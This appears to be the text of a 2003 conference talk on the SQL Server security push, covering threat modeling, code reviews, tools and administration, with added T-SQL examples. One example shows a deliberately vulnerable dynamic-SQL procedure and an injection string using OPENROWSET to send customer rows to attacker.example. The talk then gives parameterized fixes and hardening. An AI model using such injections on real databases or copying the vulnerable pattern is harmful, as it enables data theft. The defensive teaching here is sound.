Security Process & You: SQL Server Case Study
James Hamilton, General Manager SQL Server Webdata Development & Security Architect

Agenda
• Risk Escalating Rapidly
• SQL Injection Demo
• Case Study: SQL Server Security Push
• SQL Server Lessons Learned
• Security Tools & Automation
• Admin, Data Protection, & App Design
• Summary
Incidents Reported Industry Wide
CERT/CC incident statistics, 1988 through 2003.
• Incident: a single security issue, grouping together all impacts of that issue
• Issue: disruption, DoS, loss of data, misuse, damage, loss of confidentiality
[Chart: incidents reported per year, 1988 to 2003; y-axis 0 to 90,000]
Source: http://www.cert.org/stats/cert_stats.html
Know Your Enemy
Cracker tools:
• Port scanners
• Brute-force password crackers
• Dictionary-based password crackers
• Network sniffers
• De-compilers & debuggers
• Black hat community sharing
Data Thief Architecture
Components: the attacker's local DB, the vulnerable application, and the application database.
• Attack string: form values appended with an extra SQL statement
• The SQL-injected query contains an OPENROWSET statement
• The injected OPENROWSET statement causes the remote (application) DB to connect back to the attacker's DB, sending back useful data

Data Thief Demonstration
Presented by Girish Chander, SQL Server Security PM
Data Thief author: Cesar Cerrudo
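The mechanism the Data Thief slides describe, as an added T-SQL example (not code from the presentation or from Cesar Cerrudo's tool): a stored procedure that pastes a form value into dynamic SQL, the attack string that appends an INSERT ... OPENROWSET statement so the victim server connects back to the attacker's server, and the parameterized replacement. Table, procedure and host names (dbo.Customers, dbo.usp_FindCustomer_Vulnerable, dbo.Loot, attacker.example) are constructed, and the inline DECLARE initializer and multi-row VALUES need SQL Server 2008 or later.

```sql
-- Added example, not from the presentation or the Data Thief tool.
-- Constructed table with a couple of rows so the procedures have data to return.
CREATE TABLE dbo.Customers (CustomerId INT PRIMARY KEY, Name NVARCHAR(200) NOT NULL);
INSERT INTO dbo.Customers (CustomerId, Name) VALUES (1, N'Alice'), (2, N'Bob');
GO

-- 1. The vulnerable pattern: the form value is concatenated into SQL text,
--    so a quote inside it ends the string literal and the rest is parsed as SQL.
CREATE PROCEDURE dbo.usp_FindCustomer_Vulnerable @Name NVARCHAR(400)
AS
BEGIN
    DECLARE @sql NVARCHAR(4000);
    SET @sql = N'SELECT CustomerId, Name FROM dbo.Customers WHERE Name = '''
             + @Name + N'''';
    EXEC (@sql);
END;
GO

-- 2. The attack string submitted in the form field (constructed). It closes the
--    literal, appends a second statement and comments out the trailing quote.
--    The appended INSERT ... OPENROWSET makes the *victim* server open a
--    connection to the attacker's server and push the Customers rows into a
--    table there (dbo.Loot): the connect-back from the architecture slide.
--    Executing this really does attempt the outbound connection.
DECLARE @attack NVARCHAR(400) = N'x'';INSERT INTO OPENROWSET(''SQLOLEDB'','
    + N'''server=attacker.example;uid=sa;pwd=p'','
    + N'''SELECT CustomerId, Name FROM dbo.Loot'') '
    + N'SELECT CustomerId, Name FROM dbo.Customers;--';
EXEC dbo.usp_FindCustomer_Vulnerable @Name = @attack;
-- Text that EXEC() receives:
--   SELECT CustomerId, Name FROM dbo.Customers WHERE Name = 'x';
--   INSERT INTO OPENROWSET('SQLOLEDB','server=attacker.example;uid=sa;pwd=p',
--                          'SELECT CustomerId, Name FROM dbo.Loot')
--   SELECT CustomerId, Name FROM dbo.Customers;--'
GO

-- 3. The fix: the value is bound as a parameter and never becomes SQL text,
--    so the same @attack string is just a name that matches no row.
CREATE PROCEDURE dbo.usp_FindCustomer @Name NVARCHAR(400)
AS
BEGIN
    SELECT CustomerId, Name FROM dbo.Customers WHERE Name = @Name;
END;
GO

-- Where dynamic SQL is unavoidable, pass values through sp_executesql's
-- parameter list instead of concatenating them into the statement.
EXEC sp_executesql
    N'SELECT CustomerId, Name FROM dbo.Customers WHERE Name = @Name',
    N'@Name NVARCHAR(400)',
    @Name = N'Alice';
```

The injected statement only works because the victim server is allowed to open ad hoc OPENROWSET connections, which SQL Server 2000 permitted by default; the parameterized procedure removes the injection, and disabling ad hoc distributed queries removes the exfiltration channel even where some other injection remains.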
Agenda: Case Study: SQL Server Security Push
Security Push Timeline
Preparation phase: 3/15/2003 to 5/1/2003. Security push: 5/1/2003 to 8/1/2003. Push follow-on: from 8/1/2003.
Push preparation:
• Goal: full 800-person team productive from start
• Identify components
• Complete threat models
• Complete education
• Select push start date
• Security plan
• Security reps from each team
• Set triage bars
• Infrastructure set-up
Security push:
• 5 million+ lines of code reviewed
• Two releases in service, one more release in development
• 100% team focus during push: Dev, Test, PM, & UE; no other non-security work
• Three-pronged approach: targeted code reviews; tools targeting security; threat-driven reviews & testing
Push Prep: Communications
• Learning from other teams' experiences: Windows, VS .NET, & IIS preceded SQL
• Team readiness critical: don't start the security push until the team is prepared
• Security push plan: motivation, goals, approach, process, fix bar, …
• Education plan for team
• Web site set up for general announcements & communication
Push Prep: Training
• Security training for every team member; mandatory for architects, PMs, developers & testers
• Material covered includes: threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense
• Video-taped training for new team members
• Security talk series: more detail on important security-related topics; staying current with evolving threats
• On-demand webcasts (search on security): http://www.microsoft.com/usa/webcasts/ondemand/default.asp
Push Prep: Infrastructure Ready
• Cross-component team to drive the push: SQL Security Leads
• Bug tracking guidelines detailed: classification of bugs and threats
• Separate bug tracking DB for tracking file reviews: tracks code review progress & completeness
• Identification of components: 228 components; risk level assessed for each; threat model for each component
• Getting security tools running & building skills
• Clear fix criteria set
• Tracking progress is critical
Push: Threat Modeling Process
Collect background information:
• Use scenarios
• Implementation assumptions
• External dependencies
• External security notes
• Internal security notes
Model the system:
• Entry points
• Assets
• Trust levels
• Data flow diagrams / process models
Determine threats:
• Identify threats
• Analyze threats / determine vulnerabilities
• A process to understand and document threats to a system
• Methodical and complete
• Describes the system's threat profile
• Goal is to find design-level issues before code is written
Push: Example Data Flow Diagram
Push: Threat Modeling
• Threats must be understood to build secure systems
• Every spec/design goes through threat analysis
• A model of the component is created (typically a DFD)
• Threats categorized based on STRIDE
• Severity ranked based on DREAD, NOT on how hard the issue is to fix
STRIDE:
• S - Spoofing
• T - Tampering with data
• R - Repudiation
• I - Information disclosure
• D - Denial of service
• E - Elevation of privilege
DREAD:
• D - Damage potential
• R - Reproducibility
• E - Exploitability
• A - Affected users
• D - Discoverability
Push: Security SWAT Team
• Central team focused on cross-component analysis
• Members chosen from different teams; build and share security expertise
Overall approach:
• Met on a daily basis
• Chose a component based on priority & risk
• Invited relevant team members for that component
• Collectively brainstormed to ferret out cross-component threats
Experience: an effective approach; now part of the ongoing, regular effort to audit product security
Push: Dead Code Removal
• Code hygiene & work reduction: why maintain & review non-executable code?
• Code in the product might be used in future
• Dead code detector built from the code coverage tool: analyzes compiled binaries; automatically files bugs, one bug per file, assigned to the owner or last modifier
Push: Code Reviews
• Threat-model-directed & tools-driven reviews
• Code review teams set up: typically at least 2 developers and 1 tester; the code review driver is not the code owner; the tester files bugs & scribes (some teams rotated roles)
Code review experience:
• Teams progressively became more efficient
• The first 90 minutes are the most effective
• A pass over the code by the reviewer prior to the review helped
• A presentation by the code owner was very helpful
• Averaged 800-1200 lines reviewed per team per day
Push: Analytical Security Testing
A testing method that simulates how an attacker operates:
• Decompose the app (threat model driven)
• Identify interfaces
• Enumerate input points: sockets, pipes, registry, files, RPC, command-line args, etc.
• Enumerate data structures: C/C++ struct data, HTTP body, HTTP headers, HTTP header data, other protocol headers, querystrings, bit flags
• Attack all data structures, wire formats, and input data
Push: Attack Team
• Red Team: Microsoft-wide ethical cracking group
• 50-50 split between reactive work (analysis of reported bugs) and proactive work (security reviews)
• Both formal and informal security reviews; formal reviews scoped by risk exposure: the greater the exposure, the deeper the review
• Analytical security testing: advanced fuzz & data mutation tools developed
Follow-on: What was learned?
• Set realistic schedules
• Get training done before starting
• Invest in tools early & aggressively
• Clearly identify system components early
• Code reviews: provide guidelines & goals for each review
• Security focus improved overall system quality: cross-component interactions better understood; improved both functional & penetration testing
• Define unambiguous exit criteria
• Clear progress tracking metrics required
• Process sometimes interferes with progress
Agenda: Security Tools & Automation
Development Tools
• Engineers are good at finding specific vulnerabilities, but not at reliably finding all instances of a specific bug class
• Innovation required
• Millions of lines of code: focus on tools to supplement manual efforts
• Tools that can help identify issues in code; managed code is part of the answer
Development tools used:
• PREfix & PREfast
• FxCop
• Compiler/linker options: /GS (stack buffer overrun checks), /SAFESEH
• OS-level support: NOEXECUTE (hardware data execution prevention)
Sample PREfast Defect

```c
CHAR buff[MAX_PATH];
/* PREfast warning: failure to check the return value. GetWindowsDirectory
   can fail (e.g. in low-memory situations), leaving buff uninitialized,
   and the unchecked buffer is then handed to SetCurrentDirectory. */
GetWindowsDirectory(buff, sizeof(buff));
SetCurrentDirectory(buff);
```
Example Defect Classes
• Resource leakage: leaking memory/resources
• Pointer management: dereferencing a NULL pointer; dereferencing an invalid pointer; dereferencing or returning a pointer to freed memory
• Illegal state: resource in an illegal state; illegal value; divide by zero; writing to a constant string
• Memory management: double frees; freeing a pointer to non-allocated memory (stack, global, etc.); freeing a pointer into the middle of a memory block
• Initialization: using uninitialized memory; freeing or dereferencing an uninitialized pointer
• Bounds violations: overrun & underrun; failure to validate buffer size
• Managed code avoids many of these issues without post-authoring analysis tools
Agenda: Admin, Data Protection, & App Design
Application & DB Administration
Basic security practices:
• Automated enterprise software inventory
• Run MBSA frequently
• Apply the latest patches: use Windows Update or Software Update Services
• Audit authentication successes & failures at all tiers
• Corporate security policy with periodic audit
• Senior security czar with the ability to drive change
• Emergency response & disaster recovery plans
• Small admin group
• Minimum privilege & strong passwords enforced on all
Data Protection & App. Design
Data protection:
• Hot standby: clustering, log shipping, or DB mirroring (Yukon)
• Frequent backups: offsite, with media encryption
• Offline, automated, non-production test systems
• Encrypted channels for transferring sensitive information
• Use integrated security with strong passwords
• Isolate services: do not install services on a domain controller; services should run under low-privileged accounts (not shared)
• Mid-tier/data-tier isolation with multiple firewalls
• Surface area reduction: remove/disable unneeded services
Application design:
• No direct access to the data tier
• Two-tier, client-side security doesn't work: security belongs in the data tier
• Apps that "hide" DB passwords in the client tier don't work
• Access only via carefully reviewed mid-tier code
• Validate all user input
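The data-tier rules above (no direct access, reviewed mid-tier code only, low-privileged service accounts, integrated security, surface area reduction) expressed as SQL Server permissions, as an added example that is not from the presentation. Database, login, schema and procedure names (AppDb, CORP\svc-midtier, MidTierApp, api.usp_FindCustomer) are constructed, the Windows account is assumed to exist, and the syntax is SQL Server 2005 or later, which postdates the talk; on SQL Server 2000 ad hoc OPENROWSET access was controlled per provider by the DisallowAdhocAccess registry value rather than by sp_configure.

```sql
-- Added example, not from the presentation. SQL Server 2005+ syntax; names are constructed.

-- Surface area reduction: ad hoc OPENROWSET/OPENDATASOURCE queries are the
-- channel the Data Thief connect-back uses, so turn them off server-wide.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
GO

-- Constructed application database and table.
CREATE DATABASE AppDb;
GO
USE AppDb;
GO
CREATE TABLE dbo.Customers (CustomerId INT PRIMARY KEY, Name NVARCHAR(200) NOT NULL);
INSERT INTO dbo.Customers (CustomerId, Name) VALUES (1, N'Alice'), (2, N'Bob');
GO

-- One dedicated, low-privilege identity for the mid-tier, authenticated by
-- Windows (integrated security): no database password in the client or
-- mid-tier configuration to "hide". Assumes CORP\svc-midtier exists.
CREATE LOGIN [CORP\svc-midtier] FROM WINDOWS;
CREATE USER MidTierApp FOR LOGIN [CORP\svc-midtier];
GO

-- Every mid-tier entry point is a reviewed stored procedure in one schema,
-- and the user-supplied value is always a parameter, never SQL text.
CREATE SCHEMA api;
GO
CREATE PROCEDURE api.usp_FindCustomer @Name NVARCHAR(200)
AS
    SELECT CustomerId, Name FROM dbo.Customers WHERE Name = @Name;
GO

-- The application may execute procedures in api and nothing else. Base tables
-- stay unreachable; the DENY makes that explicit and survives later GRANTs.
-- api.usp_FindCustomer still reads dbo.Customers because both schemas are
-- owned by dbo (unbroken ownership chain), so no table permission is needed.
GRANT EXECUTE ON SCHEMA::api TO MidTierApp;
DENY SELECT, INSERT, UPDATE, DELETE ON SCHEMA::dbo TO MidTierApp;
GO

-- Check from the application's point of view (run as a sysadmin/dbo).
EXECUTE AS USER = 'MidTierApp';
SELECT * FROM dbo.Customers;                 -- Msg 229: SELECT permission denied; batch continues
EXEC api.usp_FindCustomer @Name = N'Alice';  -- returns the Alice row
REVERT;
```

With this layout an injection bug in the mid-tier still cannot reach base tables or open an OPENROWSET connection from the server, because the only identity the mid-tier holds can execute reviewed procedures and nothing more.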
Summary
• Threat profile increasing
• SQL Server security push case study: communication, training, infrastructure & tools, goals & exit criteria
• Security tools and techniques: threat models, security SWAT team, code reviews, analytical security testing, attack team
• Application & DB administration; data protection & application design
Resources
• Microsoft Security and Privacy site: http://www.microsoft.com/security/
• SQL Security white paper: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/sql/maintain/security/sp3sec/Default.asp
• MBSA home: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/tools/mbsahome.asp
Books:
• Microsoft Windows 2000 Security Technical Reference
• Writing Secure Code, 2/e
• Building Secure Microsoft® ASP.NET Applications